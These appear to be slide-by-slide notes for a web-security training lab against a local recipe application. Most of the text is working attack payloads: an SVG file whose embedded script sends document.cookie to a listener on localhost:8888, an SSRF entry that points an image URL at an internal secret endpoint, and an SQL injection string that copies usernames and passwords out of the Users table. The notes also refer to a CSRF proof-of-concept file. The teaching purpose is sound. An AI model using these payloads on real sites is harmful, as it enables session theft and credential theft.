slide 37 - Send the cookie to another server - phase 1, creating a file that popps an alert
=========================================================================================
create the following svg:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script type="text/javascript">
      alert("XSS");
   </script>
</svg>

slide 38 - Send the cookie to another server - phase 1, popping the alert
using the WYSIWYG:
<object data="http://localhost:5187/images/sample.svg" width="300" height="200"></object>


slide 41 - Send the cookie to another server
=========================================================================================
create the following svg:
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
<script type="text/javascript">
      fetch("http://localhost:8888/?d=" + document.cookie)
   </script>
</svg>

using the WYSIWYG:
<object data="http://localhost:5187/images/sample1.svg" width="300" height="200"></object>

using python for listening to request.
(a challenge implement the save funcionality in csharp)
python -m http.server 8888


69 72 - CSRF
=========================================================================================
Run the following 
Files\CSRFPoC.html


slide 91 - Payload for add recipes
=========================================================================================

[
    {
        "Name": "Carrot Cake",
        "Instructions": "Mix ingredients and bake.",
        "ImageUrl": "https://live.staticflickr.com/47/148164470_24b709ed61.jpg"
    }
]

slide 100 - Payload for add recipes (ssrf)
=========================================================================================
[
    {
        "Name": "Carrot Cake",
        "Instructions": "Mix ingredients and bake.",
        "ImageUrl": "http://localhost:5187/Recipes/Secret"
    }
]
slide 110 - Payload for add recipes (sqli)
=========================================================================================

Use the following payload for instructions in add recipe
','test','test');insert into Recipes(Name, Instructions, ImagePath)  select username,username,password from Users; --